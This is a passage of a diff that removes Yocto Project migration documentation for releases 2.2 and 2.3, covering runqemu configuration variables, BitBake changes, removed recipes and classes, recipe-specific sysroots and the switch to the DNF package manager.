- <filename>${</filename><link linkend='var-B'><filename>B</filename></link><filename>}</filename>
- is no longer the default working directory for tasks.
- Consequently, any custom tasks you define now need to either
- have the
- <filename>[</filename><ulink url='&YOCTO_DOCS_BB_URL;#variable-flags'><filename>dirs</filename></ulink><filename>]</filename> flag set, or the task needs to change into the
- appropriate working directory manually (e.g using
- <filename>cd</filename> for a shell task).
- <note>
- The preferred method is to use the
- <filename>[dirs]</filename> flag.
- </note>
- </para>
- </section>
-
- <section id='migration-2.2-runqemu-ported-to-python'>
- <title><filename>runqemu</filename> Ported to Python</title>
-
- <para>
- <filename>runqemu</filename> has been ported to Python and has
- changed behavior in some cases.
- Previous usage patterns continue to be supported.
- </para>
-
- <para>
- The new <filename>runqemu</filename> is a Python script.
- Machine knowledge is no longer hardcoded into
- <filename>runqemu</filename>.
- You can choose to use the <filename>qemuboot</filename>
- configuration file to define the BSP's own arguments and to make
- it bootable with <filename>runqemu</filename>.
- If you use a configuration file, use the following form:
- <literallayout class='monospaced'>
- <replaceable>image-name</replaceable>-<replaceable>machine</replaceable>.qemuboot.conf
- </literallayout>
- The configuration file enables fine-grained tuning of options
- passed to QEMU without the <filename>runqemu</filename> script
- hard-coding any knowledge about different machines.
- Using a configuration file is particularly convenient when trying
- to use QEMU with machines other than the
- <filename>qemu*</filename> machines in
- <link linkend='oe-core'>OE-Core</link>.
- The <filename>qemuboot.conf</filename> file is generated by the
- <filename>qemuboot</filename>
- class when the root filesystem is being build (i.e.
- build rootfs).
- QEMU boot arguments can be set in BSP's configuration file and
- the <filename>qemuboot</filename> class will save them to
- <filename>qemuboot.conf</filename>.
- </para>
-
-
- <para>
- If you want to use <filename>runqemu</filename> without a
- configuration file, use the following command form:
- <literallayout class='monospaced'>
- $ runqemu <replaceable>machine</replaceable> <replaceable>rootfs</replaceable> <replaceable>kernel</replaceable> [<replaceable>options</replaceable>]
- </literallayout>
- Supported <replaceable>machines</replaceable> are as follows:
- <literallayout class='monospaced'>
- qemuarm
- qemuarm64
- qemux86
- qemux86-64
- qemuppc
- qemumips
- qemumips64
- qemumipsel
- qemumips64el
- </literallayout>
- Consider the following example, which uses the
- <filename>qemux86-64</filename> machine,
- provides a root filesystem, provides an image, and uses
- the <filename>nographic</filename> option:
- <literallayout class='monospaced'>
-$ runqemu qemux86-64 tmp/deploy/images/qemux86-64/core-image-minimal-qemux86-64.ext4 tmp/deploy/images/qemux86-64/bzImage nographic
- </literallayout>
- </para>
-
- <para>
- Following is a list of variables that can be set in configuration
- files such as <filename>bsp.conf</filename> to enable the BSP
- to be booted by <filename>runqemu</filename>:
- <note>
- "QB" means "QEMU Boot".
- </note>
- <literallayout class='monospaced'>
- QB_SYSTEM_NAME: QEMU name (e.g. "qemu-system-i386")
- QB_OPT_APPEND: Options to append to QEMU (e.g. "-show-cursor")
- QB_DEFAULT_KERNEL: Default kernel to boot (e.g. "bzImage")
- QB_DEFAULT_FSTYPE: Default FSTYPE to boot (e.g. "ext4")
- QB_MEM: Memory (e.g. "-m 512")
- QB_MACHINE: QEMU machine (e.g. "-machine virt")
- QB_CPU: QEMU cpu (e.g. "-cpu qemu32")
- QB_CPU_KVM: Similar to QB_CPU except used for kvm support (e.g. "-cpu kvm64")
- QB_KERNEL_CMDLINE_APPEND: Options to append to the kernel's -append
- option (e.g. "console=ttyS0 console=tty")
- QB_DTB: QEMU dtb name
- QB_AUDIO_DRV: QEMU audio driver (e.g. "alsa", set it when support audio)
- QB_AUDIO_OPT: QEMU audio option (e.g. "-soundhw ac97,es1370"), which is used
- when QB_AUDIO_DRV is set.
- QB_KERNEL_ROOT: Kernel's root (e.g. /dev/vda)
- QB_TAP_OPT: Network option for 'tap' mode (e.g.
- "-netdev tap,id=net0,ifname=@TAP@,script=no,downscript=no -device virtio-net-device,netdev=net0").
- runqemu will replace "@TAP@" with the one that is used, such as tap0, tap1 ...
- QB_SLIRP_OPT: Network option for SLIRP mode (e.g. "-netdev user,id=net0 -device virtio-net-device,netdev=net0")
- QB_ROOTFS_OPT: Used as rootfs (e.g.
- "-drive id=disk0,file=@ROOTFS@,if=none,format=raw -device virtio-blk-device,drive=disk0").
- runqemu will replace "@ROOTFS@" with the one which is used, such as
- core-image-minimal-qemuarm64.ext4.
- QB_SERIAL_OPT: Serial port (e.g. "-serial mon:stdio")
- QB_TCPSERIAL_OPT: tcp serial port option (e.g.
- " -device virtio-serial-device -chardev socket,id=virtcon,port=@PORT@,host=127.0.0.1 -device virtconsole,chardev=virtcon"
- runqemu will replace "@PORT@" with the port number which is used.
- </literallayout>
- </para>
-
- <para>
- To use <filename>runqemu</filename>, set
- <link linkend='var-IMAGE_CLASSES'><filename>IMAGE_CLASSES</filename></link>
- as follows and run <filename>runqemu</filename>:
- <note>
- For command-line syntax, use
- <filename>runqemu help</filename>.
- </note>
- <literallayout class='monospaced'>
- IMAGE_CLASSES += "qemuboot"
- </literallayout>
- </para>
- </section>
-
- <section id='migration-2.2-default-linker-hash-style-changed'>
- <title>Default Linker Hash Style Changed</title>
-
- <para>
- The default linker hash style for <filename>gcc-cross</filename>
- is now "sysv" in order to catch recipes that are building software
- without using the OpenEmbedded
- <link linkend='var-LDFLAGS'><filename>LDFLAGS</filename></link>.
- This change could result in seeing some "No GNU_HASH in the elf
- binary" QA issues when building such recipes.
- You need to fix these recipes so that they use the expected
- <filename>LDFLAGS</filename>.
- Depending on how the software is built, the build system used by
- the software (e.g. a Makefile) might need to be patched.
- However, sometimes making this fix is as simple as adding the
- following to the recipe:
- <literallayout class='monospaced'>
- TARGET_CC_ARCH += "${LDFLAGS}"
- </literallayout>
- </para>
- </section>
-
- <section id='migration-2.2-kernel-image-base-name-no-longer-uses-kernel-imagetype'>
- <title><filename>KERNEL_IMAGE_BASE_NAME</filename> no Longer Uses <filename>KERNEL_IMAGETYPE</filename></title>
-
- <para>
- The
- <filename>KERNEL_IMAGE_BASE_NAME</filename>
- variable no longer uses the
- <link linkend='var-KERNEL_IMAGETYPE'><filename>KERNEL_IMAGETYPE</filename></link>
- variable to create the image's base name.
- Because the OpenEmbedded build system can now build multiple kernel
- image types, this part of the kernel image base name as been
- removed leaving only the following:
- <literallayout class='monospaced'>
- KERNEL_IMAGE_BASE_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}-${DATETIME}"
- </literallayout>
- If you have recipes or classes that use
- <filename>KERNEL_IMAGE_BASE_NAME</filename> directly, you might
- need to update the references to ensure they continue to work.
- </para>
- </section>
-
- <section id='migration-2.2-bitbake-changes'>
- <title>BitBake Changes</title>
-
- <para>
- The following changes took place for BitBake:
- <itemizedlist>
- <listitem><para>
- The "goggle" UI and standalone image-writer tool have
- been removed as they both require GTK+ 2.0 and
- were not being maintained.
- </para></listitem>
- <listitem><para>
- The Perforce fetcher now supports
- <link linkend='var-SRCREV'><filename>SRCREV</filename></link>
- for specifying the source revision to use, be it
- <filename>${</filename><link linkend='var-AUTOREV'><filename>AUTOREV</filename></link><filename>}</filename>,
- changelist number, p4date, or label, in preference to
- separate
- <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
- parameters to specify these.
- This change is more in-line with how the other fetchers
- work for source control systems.
- Recipes that fetch from Perforce will need to be updated
- to use <filename>SRCREV</filename> in place of specifying
- the source revision within
- <filename>SRC_URI</filename>.
- </para></listitem>
- <listitem><para>
- Some of BitBake's internal code structures for accessing
- the recipe cache needed to be changed to support the new
- multi-configuration functionality.
- These changes will affect external tools that use BitBake's
- tinfoil module.
- For information on these changes, see the changes made to
- the scripts supplied with OpenEmbedded-Core:
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?id=189371f8393971d00bca0fceffd67cc07784f6ee'>1</ulink>
- and
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?id=4a5aa7ea4d07c2c90a1654b174873abb018acc67'>2</ulink>.
- </para></listitem>
- <listitem><para>
- The task management code has been rewritten to avoid using
- ID indirection in order to improve performance.
- This change is unlikely to cause any problems for most
- users.
- However, the setscene verification function as pointed to
- by <filename>BB_SETSCENE_VERIFY_FUNCTION</filename>
- needed to change signature.
- Consequently, a new variable named
- <filename>BB_SETSCENE_VERIFY_FUNCTION2</filename>
- has been added allowing multiple versions of BitBake
- to work with suitably written metadata, which includes
- OpenEmbedded-Core and Poky.
- Anyone with custom BitBake task scheduler code might also
- need to update the code to handle the new structure.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.2-swabber-has-been-removed'>
- <title>Swabber has Been Removed</title>
-
- <para>
- Swabber, a tool that was intended to detect host contamination in
- the build process, has been removed, as it has been unmaintained
- and unused for some time and was never particularly effective.
- The OpenEmbedded build system has since incorporated a number of
- mechanisms including enhanced QA checks that mean that there is
- less of a need for such a tool.
- </para>
- </section>
-
- <section id='migration-2.2-removed-recipes'>
- <title>Removed Recipes</title>
-
- <para>
- The following recipes have been removed:
- <itemizedlist>
- <listitem><para>
- <filename>augeas</filename>:
- No longer needed and has been moved to
- <filename>meta-oe</filename>.
- </para></listitem>
- <listitem><para>
- <filename>directfb</filename>:
- Unmaintained and has been moved to
- <filename>meta-oe</filename>.
- </para></listitem>
- <listitem><para>
- <filename>gcc</filename>:
- Removed 4.9 version.
- Versions 5.4 and 6.2 are still present.
- </para></listitem>
- <listitem><para>
- <filename>gnome-doc-utils</filename>:
- No longer needed.
- </para></listitem>
- <listitem><para>
- <filename>gtk-doc-stub</filename>:
- Replaced by <filename>gtk-doc</filename>.
- </para></listitem>
- <listitem><para>
- <filename>gtk-engines</filename>:
- No longer needed and has been moved to
- <filename>meta-gnome</filename>.
- </para></listitem>
- <listitem><para>
- <filename>gtk-sato-engine</filename>:
- Became obsolete.
- </para></listitem>
- <listitem><para>
- <filename>libglade</filename>:
- No longer needed and has been moved to
- <filename>meta-oe</filename>.
- </para></listitem>
- <listitem><para>
- <filename>libmad</filename>:
- Unmaintained and functionally replaced by
- <filename>libmpg123</filename>.
- <filename>libmad</filename> has been moved to
- <filename>meta-oe</filename>.
- </para></listitem>
- <listitem><para>
- <filename>libowl</filename>:
- Became obsolete.
- </para></listitem>
- <listitem><para>
- <filename>libxsettings-client</filename>:
- No longer needed.
- </para></listitem>
- <listitem><para>
- <filename>oh-puzzles</filename>:
- Functionally replaced by
- <filename>puzzles</filename>.
- </para></listitem>
- <listitem><para>
- <filename>oprofileui</filename>:
- Became obsolete.
- OProfile has been largely supplanted by perf.
- </para></listitem>
- <listitem><para>
- <filename>packagegroup-core-directfb.bb</filename>:
- Removed.
- </para></listitem>
- <listitem><para>
- <filename>core-image-directfb.bb</filename>:
- Removed.
- </para></listitem>
- <listitem><para>
- <filename>pointercal</filename>:
- No longer needed and has been moved to
- <filename>meta-oe</filename>.
- </para></listitem>
- <listitem><para>
- <filename>python-imaging</filename>:
- No longer needed and moved to
- <filename>meta-python</filename>
- </para></listitem>
- <listitem><para>
- <filename>python-pyrex</filename>:
- No longer needed and moved to
- <filename>meta-python</filename>.
- </para></listitem>
- <listitem><para>
- <filename>sato-icon-theme</filename>:
- Became obsolete.
- </para></listitem>
- <listitem><para>
- <filename>swabber-native</filename>:
- Swabber has been removed.
- See the
- <link linkend='migration-2.2-swabber-has-been-removed'>entry on Swabber</link>.
- </para></listitem>
- <listitem><para>
- <filename>tslib</filename>:
- No longer needed and has been moved to
- <filename>meta-oe</filename>.
- </para></listitem>
- <listitem><para>
- <filename>uclibc</filename>:
- Removed in favor of musl.
- </para></listitem>
- <listitem><para>
- <filename>xtscal</filename>:
- No longer needed and moved to
- <filename>meta-oe</filename>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.2-removed-classes'>
- <title>Removed Classes</title>
-
- <para>
- The following classes have been removed:
- <itemizedlist>
- <listitem><para>
- <filename>distutils-native-base</filename>:
- No longer needed.
- </para></listitem>
- <listitem><para>
- <filename>distutils3-native-base</filename>:
- No longer needed.
- </para></listitem>
- <listitem><para>
- <filename>sdl</filename>:
- Only set
- <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>
- and
- <link linkend='var-SECTION'><filename>SECTION</filename></link>,
- which are better set within the recipe instead.
- </para></listitem>
- <listitem><para>
- <filename>sip</filename>:
- Mostly unused.
- </para></listitem>
- <listitem><para>
- <filename>swabber</filename>:
- See the
- <link linkend='migration-2.2-swabber-has-been-removed'>entry on Swabber</link>.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.2-minor-packaging-changes'>
- <title>Minor Packaging Changes</title>
-
- <para>
- The following minor packaging changes have occurred:
- <itemizedlist>
- <listitem><para>
- <filename>grub</filename>:
- Split <filename>grub-editenv</filename> into its own
- package.
- </para></listitem>
- <listitem><para>
- <filename>systemd</filename>:
- Split container and vm related units into a new package,
- systemd-container.
- </para></listitem>
- <listitem><para>
- <filename>util-linux</filename>:
- Moved <filename>prlimit</filename> to a separate
- <filename>util-linux-prlimit</filename> package.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.2-miscellaneous-changes'>
- <title>Miscellaneous Changes</title>
-
- <para>
- The following miscellaneous changes have occurred:
- <itemizedlist>
- <listitem><para>
- <filename>package_regex.inc</filename>:
- Removed because the definitions
- <filename>package_regex.inc</filename> previously contained
- have been moved to their respective recipes.
- </para></listitem>
- <listitem><para>
- Both <filename>devtool add</filename> and
- <filename>recipetool create</filename> now use a fixed
- <link linkend='var-SRCREV'><filename>SRCREV</filename></link>
- by default when fetching from a Git repository.
- You can override this in either case to use
- <filename>${</filename><link linkend='var-AUTOREV'><filename>AUTOREV</filename></link><filename>}</filename>
- instead by using the <filename>-a</filename> or
- <filename>&dash;&dash;autorev</filename> command-line
- option
- </para></listitem>
- <listitem><para>
- <filename>distcc</filename>:
- GTK+ UI is now disabled by default.
- </para></listitem>
- <listitem><para>
- <filename>packagegroup-core-tools-testapps</filename>:
- Removed Piglit.
- </para></listitem>
- <listitem><para>
- <filename>image.bbclass</filename>:
- Renamed COMPRESS(ION) to CONVERSION.
- This change means that
- <filename>COMPRESSIONTYPES</filename>,
- <filename>COMPRESS_DEPENDS</filename> and
- <filename>COMPRESS_CMD</filename> are deprecated in favor
- of <filename>CONVERSIONTYPES</filename>,
- <filename>CONVERSION_DEPENDS</filename> and
- <filename>CONVERSION_CMD</filename>.
- The <filename>COMPRESS*</filename> variable names will
- still work in the 2.2 release but metadata that does not
- need to be backwards-compatible should be changed to
- use the new names as the <filename>COMPRESS*</filename>
- ones will be removed in a future release.
- </para></listitem>
- <listitem><para>
- <filename>gtk-doc</filename>:
- A full version of <filename>gtk-doc</filename> is now
- made available.
- However, some old software might not be capable of using
- the current version of <filename>gtk-doc</filename>
- to build documentation.
- You need to change recipes that build such software so that
- they explicitly disable building documentation with
- <filename>gtk-doc</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</section>
-
-<section id='moving-to-the-yocto-project-2.3-release'>
- <title>Moving to the Yocto Project 2.3 Release</title>
-
- <para>
- This section provides migration information for moving to the
- Yocto Project 2.3 Release from the prior release.
- </para>
-
- <section id='migration-2.3-recipe-specific-sysroots'>
- <title>Recipe-specific Sysroots</title>
-
- <para>
- The OpenEmbedded build system now uses one sysroot per
- recipe to resolve long-standing issues with configuration
- script auto-detection of undeclared dependencies.
- Consequently, you might find that some of your previously
- written custom recipes are missing declared dependencies,
- particularly those dependencies that are incidentally built
- earlier in a typical build process and thus are already likely
- to be present in the shared sysroot in previous releases.
- </para>
-
- <para>
- Consider the following:
- <itemizedlist>
- <listitem><para>
- <emphasis>Declare Build-Time Dependencies:</emphasis>
- Because of this new feature, you must explicitly
- declare all build-time dependencies for your recipe.
- If you do not declare these dependencies, they are not
- populated into the sysroot for the recipe.
- </para></listitem>
- <listitem><para>
- <emphasis>Specify Pre-Installation and Post-Installation
- Native Tool Dependencies:</emphasis>
- You must specifically specify any special native tool
- dependencies of <filename>pkg_preinst</filename> and
- <filename>pkg_postinst</filename> scripts by using the
- <link linkend='var-PACKAGE_WRITE_DEPS'><filename>PACKAGE_WRITE_DEPS</filename></link>
- variable.
- Specifying these dependencies ensures that these tools
- are available if these scripts need to be run on the
- build host during the
- <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
- task.</para>
-
- <para>As an example, see the <filename>dbus</filename>
- recipe.
- You will see that this recipe has a
- <filename>pkg_postinst</filename> that calls
- <filename>systemctl</filename> if "systemd" is in
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>.
- In the example,
- <filename>systemd-systemctl-native</filename> is added to
- <filename>PACKAGE_WRITE_DEPS</filename>, which is also
- conditional on "systemd" being in
- <filename>DISTRO_FEATURES</filename>.
- </para></listitem>
- <listitem><para>
- <emphasis>Examine Recipes that Use
- <filename>SSTATEPOSTINSTFUNCS</filename>:</emphasis>
- You need to examine any recipe that uses
- <filename>SSTATEPOSTINSTFUNCS</filename> and determine
- steps to take.</para>
-
- <para>Functions added to
- <filename>SSTATEPOSTINSTFUNCS</filename> are still
- called as they were in previous Yocto Project releases.
- However, since a separate sysroot is now being populated
- for every recipe and if existing functions being called
- through <filename>SSTATEPOSTINSTFUNCS</filename> are
- doing relocation, then you will need to change these
- to use a post-installation script that is installed by a
- function added to
- <link linkend='var-SYSROOT_PREPROCESS_FUNCS'><filename>SYSROOT_PREPROCESS_FUNCS</filename></link>.
- </para>
-
- <para>For an example, see the
- <filename>pixbufcache</filename> class in
- <filename>meta/classes/</filename> in the Yocto Project
- <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>.
- <note>
- The <filename>SSTATEPOSTINSTFUNCS</filename> variable
- itself is now deprecated in favor of the
- <filename>do_populate_sysroot[postfuncs]</filename>
- task.
- Consequently, if you do still have any function or
- functions that need to be called after the sysroot
- component is created for a recipe, then you would be
- well advised to take steps to use a post installation
- script as described previously.
- Taking these steps prepares your code for when
- <filename>SSTATEPOSTINSTFUNCS</filename> is
- removed in a future Yocto Project release.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Specify the Sysroot when Using Certain
- External Scripts:</emphasis>
- Because the shared sysroot is now gone, the scripts
- <filename>oe-find-native-sysroot</filename> and
- <filename>oe-run-native</filename> have been changed such
- that you need to specify which recipe's
- <link linkend='var-STAGING_DIR_NATIVE'><filename>STAGING_DIR_NATIVE</filename></link>
- is used.
- </para></listitem>
- </itemizedlist>
- <note>
- You can find more information on how recipe-specific sysroots
- work in the
- "<link linkend='ref-classes-staging'><filename>staging.bbclass</filename></link>"
- section.
- </note>
- </para>
- </section>
-
- <section id='migration-2.3-path-variable'>
- <title><filename>PATH</filename> Variable</title>
-
- <para>
- Within the environment used to run build tasks, the environment
- variable <filename>PATH</filename> is now sanitized such that
- the normal native binary paths
- (<filename>/bin</filename>, <filename>/sbin</filename>,
- <filename>/usr/bin</filename> and so forth) are
- removed and a directory containing symbolic links linking only
- to the binaries from the host mentioned in the
- <link linkend='var-HOSTTOOLS'><filename>HOSTTOOLS</filename></link>
- and
- <link linkend='var-HOSTTOOLS_NONFATAL'><filename>HOSTTOOLS_NONFATAL</filename></link>
- variables is added to <filename>PATH</filename>.
- </para>
-
- <para>
- Consequently, any native binaries provided by the host that you
- need to call needs to be in one of these two variables at
- the configuration level.
- </para>
-
- <para>
- Alternatively, you can add a native recipe (i.e.
- <filename>-native</filename>) that provides the
- binary to the recipe's
- <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>
- value.
- <note>
- <filename>PATH</filename> is not sanitized in the same way
- within <filename>devshell</filename>.
- If it were, you would have difficulty running host tools for
- development and debugging within the shell.
- </note>
- </para>
- </section>
-
- <section id='migration-2.3-scripts'>
- <title>Changes to Scripts</title>
-
- <para>
- The following changes to scripts took place:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>oe-find-native-sysroot</filename>:</emphasis>
- The usage for the
- <filename>oe-find-native-sysroot</filename> script has
- changed to the following:
- <literallayout class='monospaced'>
- $ . oe-find-native-sysroot <replaceable>recipe</replaceable>
- </literallayout>
- You must now supply a recipe for
- <replaceable>recipe</replaceable> as part of the command.
- Prior to the Yocto Project &DISTRO; release, it was not
- necessary to provide the script with the command.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>oe-run-native</filename>:</emphasis>
- The usage for the
- <filename>oe-run-native</filename> script has changed
- to the following:
- <literallayout class='monospaced'>
- $ oe-run-native <replaceable>native_recipe</replaceable> <replaceable>tool</replaceable>
- </literallayout>
- You must supply the name of the native recipe and the tool
- you want to run as part of the command.
- Prior to the Yocto Project &DISTRO; release, it was not
- necessary to provide the native recipe with the command.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>cleanup-workdir</filename>:</emphasis>
- The <filename>cleanup-workdir</filename> script has been
- removed because the script was found to be deleting
- files it should not have, which lead to broken build
- trees.
- Rather than trying to delete portions of
- <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
- and getting it wrong, it is recommended that you
- delete <filename>TMPDIR</filename> and have it restored
- from shared state (sstate) on subsequent builds.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>wipe-sysroot</filename>:</emphasis>
- The <filename>wipe-sysroot</filename> script has been
- removed as it is no longer needed with recipe-specific
- sysroots.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.3-functions'>
- <title>Changes to Functions</title>
-
- <para>
- The previously deprecated
- <filename>bb.data.getVar()</filename>,
- <filename>bb.data.setVar()</filename>, and
- related functions have been removed in favor of
- <filename>d.getVar()</filename>,
- <filename>d.setVar()</filename>, and so forth.
- </para>
-
- <para>
- You need to fix any references to these old functions.
- </para>
- </section>
-
- <section id='migration-2.3-bitbake-changes'>
- <title>BitBake Changes</title>
-
- <para>
- The following changes took place for BitBake:
- <itemizedlist>
- <listitem><para>
- <emphasis>BitBake's Graphical Dependency Explorer UI Replaced:</emphasis>
- BitBake's graphical dependency explorer UI
- <filename>depexp</filename> was replaced by
- <filename>taskexp</filename> ("Task Explorer"), which
- provides a graphical way of exploring the
- <filename>task-depends.dot</filename> file.
- The data presented by Task Explorer is much more
- accurate than the data that was presented by
- <filename>depexp</filename>.
- Being able to visualize the data is an often requested
- feature as standard <filename>*.dot</filename> file
- viewers cannot usual cope with the size of
- the <filename>task-depends.dot</filename> file.
- </para></listitem>
- <listitem><para>
- <emphasis>BitBake "-g" Output Changes:</emphasis>
- The <filename>package-depends.dot</filename> and
- <filename>pn-depends.dot</filename> files as previously
- generated using the <filename>bitbake -g</filename> command
- have been removed.
- A <filename>recipe-depends.dot</filename> file
- is now generated as a collapsed version of
- <filename>task-depends.dot</filename> instead.
- </para>
-
- <para>The reason for this change is because
- <filename>package-depends.dot</filename> and
- <filename>pn-depends.dot</filename> largely date back
- to a time before task-based execution and do not take
- into account task-level dependencies between recipes,
- which could be misleading.
- </para></listitem>
- <listitem><para>
- <emphasis>Mirror Variable Splitting Changes:</emphasis>
- Mirror variables including
- <link linkend='var-MIRRORS'><filename>MIRRORS</filename></link>,
- <link linkend='var-PREMIRRORS'><filename>PREMIRRORS</filename></link>,
- and
- <link linkend='var-SSTATE_MIRRORS'><filename>SSTATE_MIRRORS</filename></link>
- can now separate values entirely with spaces.
- Consequently, you no longer need "\\n".
- BitBake looks for pairs of values, which simplifies usage.
- There should be no change required to existing mirror
- variable values themselves.
- </para></listitem>
- <listitem><para>
- <emphasis>The Subversion (SVN) Fetcher Uses an "ssh" Parameter and Not an "rsh" Parameter:</emphasis>
- The SVN fetcher now takes an "ssh" parameter instead of an
- "rsh" parameter.
- This new optional parameter is used when the "protocol"
- parameter is set to "svn+ssh".
- You can only use the new parameter to specify the
- <filename>ssh</filename> program used by SVN.
- The SVN fetcher passes the new parameter through the
- <filename>SVN_SSH</filename> environment variable during
- the
- <link linkend='ref-tasks-fetch'><filename>do_fetch</filename></link>
- task.</para>
-
- <para>See the
- "<ulink url='&YOCTO_DOCS_BB_URL;#svn-fetcher'>Subversion (SVN) Fetcher (svn://)</ulink>"
- section in the BitBake User Manual for additional
- information.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>BB_SETSCENE_VERIFY_FUNCTION</filename>
- and <filename>BB_SETSCENE_VERIFY_FUNCTION2</filename>
- Removed:</emphasis>
- Because the mechanism they were part of is no longer
- necessary with recipe-specific sysroots, the
- <filename>BB_SETSCENE_VERIFY_FUNCTION</filename> and
- <filename>BB_SETSCENE_VERIFY_FUNCTION2</filename>
- variables have been removed.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.3-absolute-symlinks'>
- <title>Absolute Symbolic Links</title>
-
- <para>
- Absolute symbolic links (symlinks) within staged files are no
- longer permitted and now trigger an error.
- Any explicit creation of symlinks can use the
- <filename>lnr</filename> script, which is a replacement for
- <filename>ln -r</filename>.
- </para>
-
- <para>
- If the build scripts in the software that the recipe is building
- are creating a number of absolute symlinks that need to be
- corrected, you can inherit
- <filename>relative_symlinks</filename> within the recipe to turn
- those absolute symlinks into relative symlinks.
- </para>
- </section>
-
- <section id='migration-2.3-gplv2-and-gplv3-moves'>
- <title>GPLv2 Versions of GPLv3 Recipes Moved</title>
-
- <para>
- Older GPLv2 versions of GPLv3 recipes have moved to a
- separate <filename>meta-gplv2</filename> layer.
- </para>
-
- <para>
- If you use
- <link linkend='var-INCOMPATIBLE_LICENSE'><filename>INCOMPATIBLE_LICENSE</filename></link>
- to exclude GPLv3 or set
- <link linkend='var-PREFERRED_VERSION'><filename>PREFERRED_VERSION</filename></link>
- to substitute a GPLv2 version of a GPLv3 recipe, then you must add
- the <filename>meta-gplv2</filename> layer to your configuration.
- <note>
- You can find <filename>meta-gplv2</filename> layer in the
- OpenEmbedded layer index at
- <ulink url='https://layers.openembedded.org/layerindex/branch/master/layer/meta-gplv2/'></ulink>.
- </note>
- </para>
-
- <para>
- These relocated GPLv2 recipes do not receive the same level of
- maintenance as other core recipes.
- The recipes do not get security fixes and upstream no longer
- maintains them.
- In fact, the upstream community is actively hostile towards people
- that use the old versions of the recipes.
- Moving these recipes into a separate layer both makes the different
- needs of the recipes clearer and clearly identifies the number of
- these recipes.
- <note>
- The long-term solution might be to move to BSD-licensed
- replacements of the GPLv3 components for those that need to
- exclude GPLv3-licensed components from the target system.
- This solution will be investigated for future Yocto
- Project releases.
- </note>
- </para>
- </section>
-
- <section id='migration-2.3-package-management-changes'>
- <title>Package Management Changes</title>
-
- <para>
- The following package management changes took place:
- <itemizedlist>
- <listitem><para>
- Smart package manager is replaced by DNF package manager.
- Smart has become unmaintained upstream, is not ported
- to Python 3.x.
- Consequently, Smart needed to be replaced.
- DNF is the only feasible candidate.</para>
- <para>The change in functionality is that the on-target
- runtime package management from remote package feeds is
- now done with a different tool that has a
- different set of command-line options.
- If you have scripts that call the
- tool directly, or use its API, they need to be fixed.</para>
- <para>For more information, see the
- <ulink url='http://dnf.readthedocs.io/en/latest/'>DNF Documentation</ulink>.
- </para></listitem>
- <listitem><para>
- Rpm 5.x is replaced with Rpm 4.x.
- This is done for two major reasons:
- <itemizedlist>
- <listitem><para>
- DNF is API-incompatible with Rpm 5.x and porting
- it and maintaining the port is non-trivial.
- </para></listitem>
- <listitem><para>
- Rpm 5.x itself has limited maintenance upstream,
- and the Yocto Project is one of the very few
- remaining users.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- Berkeley DB 6.x is removed and Berkeley DB 5.x becomes
- the default:
- <itemizedlist>
- <listitem><para>
- Version 6.x of Berkeley DB has largely been
- rejected by the open source community due to its
- AGPLv3 license.
- As a result, most mainstream open source projects
- that require DB are still developed and tested with
- DB 5.x.
- </para></listitem>
- <listitem><para>
- In OE-core, the only thing that was requiring
- DB 6.x was Rpm 5.x.
- Thus, no reason exists to continue carrying DB 6.x
- in OE-core.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <filename>createrepo</filename> is replaced with
- <filename>createrepo_c</filename>.</para>
- <para><filename>createrepo_c</filename> is the current
- incarnation of the tool that generates remote repository
- metadata.
- It is written in C as compared to
- <filename>createrepo</filename>, which is written in
- Python.
- <filename>createrepo_c</filename> is faster and is
- maintained.
- </para></listitem>
- <listitem><para>
- Architecture-independent RPM packages are "noarch"
- instead of "all".</para>
- <para>This change was made because too many places in
- DNF/RPM4 stack already make that assumption.
- Only the filenames and the architecture tag has changed.
- Nothing else has changed in OE-core system, particularly
- in the
- <link linkend='ref-classes-allarch'><filename>allarch.bbclass</filename></link>
- class.
- </para></listitem>
- <listitem><para>
- Signing of remote package feeds using
- <filename>PACKAGE_FEED_SIGN</filename>
- is not currently supported.
- This issue will be fully addressed in a future
- Yocto Project release.
- See <ulink url='https://bugzilla.yoctoproject.org/show_bug.cgi?id=11209'>defect 11209</ulink>
- for more information on a solution to package feed
- signing with RPM in the Yocto Project 2.3 release.
- </para></listitem>
- <listitem><para>
- OPKG now uses the libsolv backend for resolving package
- dependencies by default.
- This is vastly superior to OPKG's internal ad-hoc solver
- that was previously used.
- This change does have a small impact on disk (around
- 500 KB) and memory footprint.
- <note>
- For further details on this change, see the
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?
-id=f4d4f99cfbc2396e49c1613a7d237b9e57f06f81'>commit message</ulink>.
- </note>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.3-removed-recipes'>
- <title>Removed Recipes</title>
-
- <para>
- The following recipes have been removed:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>linux-yocto 4.8:</filename></emphasis>
- Version 4.8 has been removed.
- Versions 4.1 (LTSI), 4.4 (LTS), 4.9 (LTS/LTSI) and 4.10
- are now present.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>python-smartpm:</filename></emphasis>
